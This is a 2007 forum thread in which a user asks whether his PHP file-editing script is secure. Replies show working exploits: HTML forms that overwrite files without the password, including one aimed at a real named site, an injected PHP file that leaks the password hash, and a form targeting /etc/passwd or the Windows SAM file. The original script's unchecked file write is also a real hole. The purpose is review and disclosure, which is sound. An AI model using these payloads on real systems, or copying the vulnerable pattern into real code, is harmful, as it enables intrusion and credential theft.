Is this secure? (PHP and filesystem)

earlz · Post by **earlz** » Mon Jun 04, 2007 2:01 am

I have made a cool little script to allow me to edit files quick and easily, just enter my password and go..(plus I can have one part automatically add timestamps in the text for me!)
so now..is this secure?
this is the code:

Code: Select all

<?php
/**Made by Jordan Earls...
it depends on you to send a valid filename in 'file' and for you to put a style
this can be 'blog' for blogging like updating, or anything else for standard editing
also the plain text user password is sent in 'pass' and umm..that's it..NOTE no 'edit' value should
be sent from the calling script, it should only be used internally with this file!(everything should be in POST

**/
  $password="<CENSORED>"; //the MD5 hashed password

if($_POST['edit']=="edit"){ //if we need to edit the file
	file_put_contents($_POST['file'],stripslashes(html_entity_decode($_POST['new_text'],ENT_NOQUOTES))); //dunno why we stripslashes twice, but it works..
	echo "File updated!"; //stay calm! lol
}
if($_POST['edit']=="blog"){ //If using blog like editing
$retr=chr(13).chr(10); //just a convientent way to say '\n\r'
$past_content=file_get_contents($_POST['file']); //store the current contents..
$fhandle=fopen($_POST['file'],"w+b");
fwrite($fhandle,":.:".'<font size=5><u>'.stripslashes($_POST['name']).'</u></font>'.":.:".$retr); //write the first line which has the submission name
fwrite($fhandle,stripslashes($_POST['text'])); //write the actual text after it
fwrite($fhandle,$retr.'<font size=1>'.'['.date("r").']'.'</font>'.$retr.$retr.'<hr>'.$retr); //now write a small timestamp
fwrite($fhandle,$past_content); //write it back
fclose($fhandle);
echo "Blog File Updated!";
}

?>

<html>
<head>
<title>Edit Pages</title>
</head>
<body>
<?php
if(md5($_POST['pass'])==$password){
?>
<form name="input" action="" method="POST">
<?php
 if($_POST['style']!="blog"){
?>
<textarea rows=40 cols=80 name="new_text"><?php echo stripslashes(htmlentities(file_get_contents($_POST['file']),ENT_NOQUOTES)); ?></textarea>
<input type="hidden" name="file" value="<?echo $_POST['file'];?>"><br>
<input type="hidden" name="edit" value="edit"><br>
<input type="hidden" name="style" value="<?echo $_POST['style'];?>">
<input type="hidden" name="pass" value="<?echo $_POST['pass'];?>">
<input type="submit" name="submitbut" value="Edit File">
<?php
 }else{ //if using blog way
?>
Name of submission: <input type="text" name="name"><br><br>
<textarea rows=20 cols=40 name="text"></textarea><br><br>
<input type="hidden" name="file" value="<?echo $_POST['file'];?>">
<input type="hidden" name="edit" value="blog">
<input type="hidden" name="style" value="<?echo $_POST['style'];?>">
<input type="hidden" name="pass" value="<?echo $_POST['pass'];?>">
<input type="submit" name="submitbut" value="Edit







<?}?>
</form>


<?php
 }else{ //the password didn't match!
?>
You are not allowed to access this page, the password was incorrect...(don't try anything stupid you hackers)

<?}?>

and it is simply called from my pages like this:

Code: Select all

<form name="edit" action="update.php" method="POST">
<input type="password" name="pass"><br>
<input type="hidden" name="file" value="<?echo $content_filename?>">
<input type="hidden" name="style" value="<?echo $edit_style?>">
<input type="submit" value="Edit This Page"><br>

</form>

and those variables echo'd there are set depending on which page I am..

so is all of this stuff secure? like, unless someone decides to just attack with random passwords, it's pretty much hack-proof?
I really don't care that my password is sent unencrypted btw..I use a different password for it anyway..

dave · Post by **dave** » Mon Jun 04, 2007 10:34 pm

Well, for starters that is completely insecure. At minimum put a password check around the code that actually does the work.

Here is a little test for you. just copy and paste it to an html file.

Code: Select all

<html>
<head>
</head>
<body>

<form name="edit" action="http://jouleos.galekus.com/update.php" method="POST">
Name of submission: <input type="text" name="name"><br><br> 
<textarea rows=20 cols=40 name="text"></textarea><br><br> 
<input type="hidden" name="file" value="blog.txt"> 
<input type="hidden" name="edit" value="blog"> 
<input type="hidden" name="style" value="blog"> 
<input type="hidden" name="pass" value="doesntmatter"> 
<input type="submit" name="submitbut" value="Edit">
</form> 

</body>
</html>

Dave

Zacariaz · Post by **Zacariaz** » Mon Jun 04, 2007 11:04 pm

in my oppinion there is nothing you can do in the code it self to make it completely secure.

dave · Post by **dave** » Mon Jun 04, 2007 11:14 pm

ya but you could at least make it so you actually need the password.

B.E · Post by **B.E** » Tue Jun 05, 2007 12:36 am

First find out what's going to haven when this is submited

Code: Select all

<html>
<body>
<form name="input" action="http://<site to which your script is on>/update.php" method="POST">
<textarea rows=40 cols=80 name="new_text"></textarea> 
<input type="hidden" name="file" value="temp.php"><br> 
<input type="hidden" name="edit" value="edit"><br> 
<input type="submit" name="submitbut" value="Edit File"> 
</form>

and enter the following into the textfield.

Code: Select all

<?
   include "update.php";
   echo $password;
?>

thenwent to http://<your site>/temp.php cracked the resulting md5 code (which would be your password). THen used the following form with that password.

Code: Select all

<form name="edit" action="update.php" method="POST">
<input type="password" name="pass"><br>
<input type="hidden" name="file" value="/etc/passwd"> // you could use C:\\windows\system32\sam
<input type="hidden" name="style" value="">
<input type="submit" value="Edit This Page"><br>

</form>

earlz · Post by **earlz** » Tue Jun 05, 2007 11:24 am

ok..thanks for hacking it everyone!

Best get hacked and a small message be displayed, than later on some hacker deletes all my content(which I don't backup very often)

but yea..I've removed the script from my actual site now..
I'm going to
1. disable off-site access
2. check the password at the beginning, not at the display so that it checks the password when it saves

one question..
how did you do that include 'update.php' I thought you had to be on the site to do that!

dave · Post by **dave** » Tue Jun 05, 2007 12:36 pm

Well, since a form specifies which file to write to on the server and you used "w+b" in you call to fopen a nonexistent file will be created in your webserver's directory. Meaning if that php code is specified to write to a new php file your script will create the file and dump the code into the file. Then the url to that file can be specified causeing the code to execute on the server.

B.E · Post by **B.E** » Tue Jun 05, 2007 2:28 pm

hckr83 wrote:how did you do that include 'update.php' I thought you had to be on the site to do that!

I used a secuirty hole with the following lines

Code: Select all

if($_POST['edit']=="edit"){ //if we need to edit the file
   file_put_contents($_POST['file'],stripslashes(html_entity_decode($_POST['new_text'],ENT_NOQUOTES))); //dunno why we stripslashes twice, but it works..
   echo "File updated!"; //stay calm! lol
}

because you don't check what $_POST['file'] is. i was able to specify a file name my self (which was temp.php). As it was a .php your server intperpted it as a executable script. I simple provided the contents of a php script, which I included your update.php (which contained the $password varaiable).

OSDev.org

Is this secure? (PHP and filesystem)

Is this secure? (PHP and filesystem)

Re: Is this secure? (PHP and filesystem)